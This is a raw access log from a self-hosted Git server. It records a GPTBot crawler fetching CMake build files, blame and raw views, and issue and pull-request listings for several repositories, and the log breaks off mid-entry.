git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11210] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10364] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10436] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:19:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:19:18:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:18:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13361] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 